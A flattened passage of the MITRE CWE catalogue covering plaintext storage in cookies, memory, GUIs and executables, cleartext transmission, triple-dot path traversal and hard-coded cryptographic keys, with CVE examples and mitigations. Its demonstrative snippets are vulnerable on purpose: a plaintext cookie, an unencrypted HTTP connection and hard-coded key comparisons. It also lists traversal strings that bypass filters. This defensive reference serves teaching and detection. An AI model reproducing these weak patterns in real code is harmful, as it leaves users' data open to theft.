updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Plaintext Storage in Registry + Plaintext Storage in the Registry + + + + The product stores sensitive information in cleartext in a cookie. + Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following code excerpt stores a plaintext user account ID in a browser cookie. + + response.addCookie( new Cookie("userAccountID", acctID); + + Because the account ID is in plaintext, the user's account information is exposed if their computer is compromised by an attacker. + + + + + CVE-2002-1800 + Admin password in cleartext in a cookie. + https://www.cve.org/CVERecord?id=CVE-2002-1800 + + + CVE-2001-1537 + Default configuration has cleartext usernames/passwords in cookie. + https://www.cve.org/CVERecord?id=CVE-2001-1537 + + + CVE-2001-1536 + Usernames/passwords in cleartext in cookies. + https://www.cve.org/CVERecord?id=CVE-2001-1536 + + + CVE-2005-2160 + Authentication information stored in cleartext in a cookie. + https://www.cve.org/CVERecord?id=CVE-2005-2160 + + + + + Plaintext Storage in Cookie + + + SFP23 + Exposed Data + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Plaintext Storage in Cookie + Plaintext Storage in a Cookie + + + + The product stores sensitive information in cleartext in memory. + + The sensitive memory might be saved to disk, stored in a core dump, or remain uncleared if the product crashes, or if the programmer does not properly clear the memory before freeing it. + It could be argued that such problems are usually only exploitable by those with administrator privileges. However, swapping could cause the memory to be written to disk and leave it accessible to physical attack afterwards. Core dump files might have insecure permissions or be stored in archive files that are accessible to untrusted people. Or, uncleared sensitive memory might be inadvertently exposed to attackers due to another weakness. + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Memory + + + + + CVE-2001-1517 + Sensitive authentication information in cleartext in memory. + https://www.cve.org/CVERecord?id=CVE-2001-1517 + + + BID:10155 + Sensitive authentication information in cleartext in memory. + http://www.securityfocus.com/bid/10155 + + + CVE-2001-0984 + Password protector leaves passwords in memory when window is minimized, even when "clear password when minimized" is set. + https://www.cve.org/CVERecord?id=CVE-2001-0984 + + + CVE-2003-0291 + SSH client does not clear credentials from memory. + https://www.cve.org/CVERecord?id=CVE-2003-0291 + + + + Memory + + + + Plaintext Storage in Memory + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This could be a resultant weakness, e.g. if the compiler removes code that was intended to wipe memory. + Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Plaintext Storage in Memory + + + + The product stores sensitive information in cleartext within the GUI. + An attacker can often obtain data from a GUI, even if hidden, by using an API to directly access GUI objects such as windows and menus. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Memory + Read Application Data + + + + + CVE-2002-1848 + Unencrypted passwords stored in GUI dialog may allow local users to access the passwords. + https://www.cve.org/CVERecord?id=CVE-2002-1848 + + + + + Plaintext Storage in GUI + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Plaintext Storage in GUI + + + + The product stores sensitive information in cleartext in an executable. + Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + CVE-2005-1794 + Product stores RSA private key in a DLL and uses it to sign a certificate, allowing spoofing of servers and Adversary-in-the-Middle (AITM) attacks. + https://www.cve.org/CVERecord?id=CVE-2005-1794 + + + CVE-2001-1527 + administration passwords in cleartext in executable + https://www.cve.org/CVERecord?id=CVE-2001-1527 + + + + + Plaintext Storage in Executable + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Plaintext Storage in Executable + + + + The product transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. + + Many communication channels can be "sniffed" (monitored) by adversaries during data transmission. For example, in networking, packets can traverse many intermediary nodes from the source to the destination, whether across the internet, an internal network, the cloud, etc. Some actors might have privileged access to a network interface or any link along the channel, such as a router, but they might not be authorized to collect the underlying data. As a result, network traffic could be sniffed by adversaries, spilling security-critical data. + Applicable communication channels are not limited to software products. Applicable channels include hardware-specific technologies such as internal hardware networks and external debug channels, supporting remote JTAG debugging. When mitigations are not applied to combat adversaries within the product's threat model, this weakness significantly lowers the difficulty of exploitation by such adversaries. + When full communications are recorded or logged, such as with a packet dump, an adversary could attempt to obtain the dump long after the transmission has occurred and try to "sniff" the cleartext from the recorded communications in the dump itself. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. + + + + + + + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Architecture and Design + For hardware, this may be introduced when design does not plan for an attacker having physical access while a legitimate user is remotely operating the device. + + + Operation + + + System Configuration + + + High + + + Integrity + Confidentiality + Read Application Data + Modify Files or Directories + Anyone can read the information by gaining access to the channel being used for communication. + + + + + Black Box + + Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process, trigger the feature that sends the data, and look for the presence or absence of common cryptographic functions in the call tree. Monitor the network and determine if the data packets contain readable commands. Tools exist for detecting if certain encodings are in use. If the traffic contains high entropy, this might indicate the usage of encryption. + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Before transmitting, encrypt the data using reliable, confidentiality-protecting cryptographic protocols. + + + Implementation + When using web applications with SSL, use SSL for the entire session from login to logout, not just for the initial login page. + + + Implementation + When designing hardware platforms, ensure that approved encryption algorithms (such as those recommended by NIST) protect paths from security critical data to trusted user applications. + + + Testing + Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Operation + Configure servers to use encrypted channels for communication, which may include SSL or other secure protocols. + + + + + The following code attempts to establish a connection to a site to communicate sensitive information. + + try {URL u = new URL("http://www.secret.example.org/");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod("PUT");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();}catch (IOException e) { + //... + + } + + Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors used cleartext transmission of sensitive information in their OT products. + + + A TAP accessible register is read/written by a JTAG based tool, for internal use by authorized users. However, an adversary can connect a probing device and collect the values from the unencrypted channel connecting the JTAG interface to the authorized user, if no additional protections are employed. + + + The following Azure CLI command lists the properties of a particular storage account: + + az storage account show -g {ResourceGroupName} -n {StorageAccountName} + + The JSON result might be: + + + { + + "name": "{StorageAccountName}", + "enableHttpsTrafficOnly": false, + "type": "Microsoft.Storage/storageAccounts" + + } + + + The enableHttpsTrafficOnly value is set to false, because the default setting for Secure transfer is set to Disabled. This allows cloud storage resources to successfully connect and transfer data without the use of encryption (e.g., HTTP, SMB 2.1, SMB 3.0, etc.). + Azure's storage accounts can be configured to only accept requests from secure connections made over HTTPS. The secure transfer setting can be enabled using Azure's Portal (GUI) or programmatically by setting the enableHttpsTrafficOnly property to True on the storage account, such as: + + az storage account update -g {ResourceGroupName} -n {StorageAccountName} --https-only true + + The change can be confirmed from the result by verifying that the enableHttpsTrafficOnly value is true: + + + { + + "name": "{StorageAccountName}", + "enableHttpsTrafficOnly": true, + "type": "Microsoft.Storage/storageAccounts" + + } + + + + Note: to enable secure transfer using Azure's Portal instead of the command line: + + 1. Open the Create storage account pane in the Azure portal. + 2. In the Advanced page, select the Enable secure transfer checkbox. + + + + + + + CVE-2022-29519 + Programmable Logic Controller (PLC) sends sensitive information in plaintext, including passwords and session tokens. + https://www.cve.org/CVERecord?id=CVE-2022-29519 + + + CVE-2022-30312 + Building Controller uses a protocol that transmits authentication credentials in plaintext. + https://www.cve.org/CVERecord?id=CVE-2022-30312 + + + CVE-2022-31204 + Programmable Logic Controller (PLC) sends password in plaintext. + https://www.cve.org/CVERecord?id=CVE-2022-31204 + + + CVE-2002-1949 + Passwords transmitted in cleartext. + https://www.cve.org/CVERecord?id=CVE-2002-1949 + + + CVE-2008-4122 + Chain: Use of HTTPS cookie without "secure" flag causes it to be transmitted across unencrypted HTTP. + https://www.cve.org/CVERecord?id=CVE-2008-4122 + + + CVE-2008-3289 + Product sends password hash in cleartext in violation of intended policy. + https://www.cve.org/CVERecord?id=CVE-2008-3289 + + + CVE-2008-4390 + Remote management feature sends sensitive information including passwords in cleartext. + https://www.cve.org/CVERecord?id=CVE-2008-4390 + + + CVE-2007-5626 + Backup routine sends password in cleartext in email. + https://www.cve.org/CVERecord?id=CVE-2007-5626 + + + CVE-2004-1852 + Product transmits Blowfish encryption key in cleartext. + https://www.cve.org/CVERecord?id=CVE-2004-1852 + + + CVE-2008-0374 + Printer sends configuration information, including administrative password, in cleartext. + https://www.cve.org/CVERecord?id=CVE-2008-0374 + + + CVE-2007-4961 + Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294). + https://www.cve.org/CVERecord?id=CVE-2007-4961 + + + CVE-2007-4786 + Product sends passwords in cleartext to a log server. + https://www.cve.org/CVERecord?id=CVE-2007-4786 + + + CVE-2005-3140 + Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes. + https://www.cve.org/CVERecord?id=CVE-2005-3140 + + + + + Plaintext Transmission of Sensitive Information + + + SEC06-J + Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar + + + SER02-J + Sign then seal sensitive objects before sending them outside a trust boundary + + + SFP23 + Exposed Data + + + Part 3-3 + Req SR 4.1 + + + Part 4-2 + Req CR 4.1B + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms, Common_Consequences, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-06-21 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Observed_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-01-23 + updated Abstraction + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Description, Mapping_Notes, Relationships + + + Accellera IP Security Assurance (IPSA) Working Group + Accellera Systems Initiative + 2023-01-24 + Submitted original contents of CWE-1324 and reviewed its integration into this entry. + + Plaintext Transmission of Sensitive Information + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '...' (triple dot) sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The '...' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to "..\.." and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of "./" sequences, can ultimately produce valid ".." sequences due to a collapse into unsafe value (CWE-182). + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2001-0467 + "\..." in web server + https://www.cve.org/CVERecord?id=CVE-2001-0467 + + + CVE-2001-0615 + "..." or "...." in chat server + https://www.cve.org/CVERecord?id=CVE-2001-0615 + + + CVE-2001-0963 + "..." in cd command in FTP server + https://www.cve.org/CVERecord?id=CVE-2001-0963 + + + CVE-2001-1193 + "..." in cd command in FTP server + https://www.cve.org/CVERecord?id=CVE-2001-1193 + + + CVE-2001-1131 + "..." in cd command in FTP server + https://www.cve.org/CVERecord?id=CVE-2001-1131 + + + CVE-2001-0480 + read of arbitrary files and directories using GET or CD with "..." in Windows-based FTP server. + https://www.cve.org/CVERecord?id=CVE-2001-0480 + + + CVE-2002-0288 + read files using "." and Unicode-encoded "/" or "\" characters in the URL. + https://www.cve.org/CVERecord?id=CVE-2002-0288 + + + CVE-2003-0313 + Directory listing of web server using "..." + https://www.cve.org/CVERecord?id=CVE-2003-0313 + + + CVE-2005-1658 + Triple dot + https://www.cve.org/CVERecord?id=CVE-2005-1658 + + + + + '...' (triple dot) + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This manipulation-focused entry is currently hiding two distinct weaknesses, so it might need to be split. The manipulation is effective in two different contexts: + + it is equivalent to "..\.." on Windows, or + it can take advantage of incomplete filtering, e.g. if the programmer does a single-pass removal of "./" in a string (collapse of data into unsafe value, CWE-182). + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Maintenance_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Maintenance_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Triple Dot - '...' + + + + The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered. + + + + + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + If hard-coded cryptographic keys are used, it is almost certain that malicious users will gain access through the account in question. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Prevention schemes mirror that of hard-coded password storage. + + + + + The following code examples attempt to verify a password using a hard-coded cryptographic key. + + int VerifyAdmin(char *password) { + if (strcmp(password,"68af404b513073584c4b6f22b6c63e6b")) { + + printf("Incorrect Password!\n");return(0); + }printf("Entering Diagnostic Mode...\n");return(1); + } + + + public boolean VerifyAdmin(String password) {if (password.equals("68af404b513073584c4b6f22b6c63e6b")) {System.out.println("Entering Diagnostic Mode...");return true;}System.out.println("Incorrect Password!");return false; + + + + int VerifyAdmin(String password) {if (password.Equals("68af404b513073584c4b6f22b6c63e6b")) {Console.WriteLine("Entering Diagnostic Mode...");return(1);}Console.WriteLine("Incorrect Password!");return(0);} + + The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors used hard-coded keys for critical functionality in their OT products. + + + + + CVE-2022-29960 + Engineering Workstation uses hard-coded cryptographic keys that could allow for unathorized filesystem access and privilege escalation + https://www.cve.org/CVERecord?id=CVE-2022-29960 + + + CVE-2022-30271 + Remote Terminal Unit (RTU) uses a hard-coded SSH private key that is likely to be used by default. + https://www.cve.org/CVERecord?id=CVE-2022-30271 + + + CVE-2020-10884 + WiFi router service has a hard-coded encryption key, allowing root access + https://www.cve.org/CVERecord?id=CVE-2020-10884 + + + CVE-2014-2198 + Communications / collaboration product has a hardcoded SSH private key, allowing access to root account + https://www.cve.org/CVERecord?id=CVE-2014-2198 + + + + + Use of hard-coded cryptographic key + + + A8 + Insecure Cryptographic Storage + CWE More Specific + + + A9 + Insecure Communications + CWE More Specific + + + A8 + Insecure Storage + CWE More Specific + + + SFP33 + Hardcoded sensitive data + + + Part 2-4 + Req SP.03.10 RE(1) + + + Part 2-4 + Req SP.03.10 RE(3) + + + Part 3-3 + Req SR 1.5 + + + Part 3-3 + Req SR 4.3 + + + Part 4-1 + Req SD-1 + + + Part 4-2 + Req SR 4.3 + + + Part 4-2 + Req CR 7.3 + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The main difference between the use of hard-coded passwords and the use of hard-coded cryptographic keys is the false sense of security that the former conveys. Many people believe that simply hashing a hard-coded password before storage will protect the information from malicious users. However, many hashes are reversible (or at least vulnerable to brute force attacks) -- and further, many authentication protocols simply request the hash itself, making it no better than a password. + 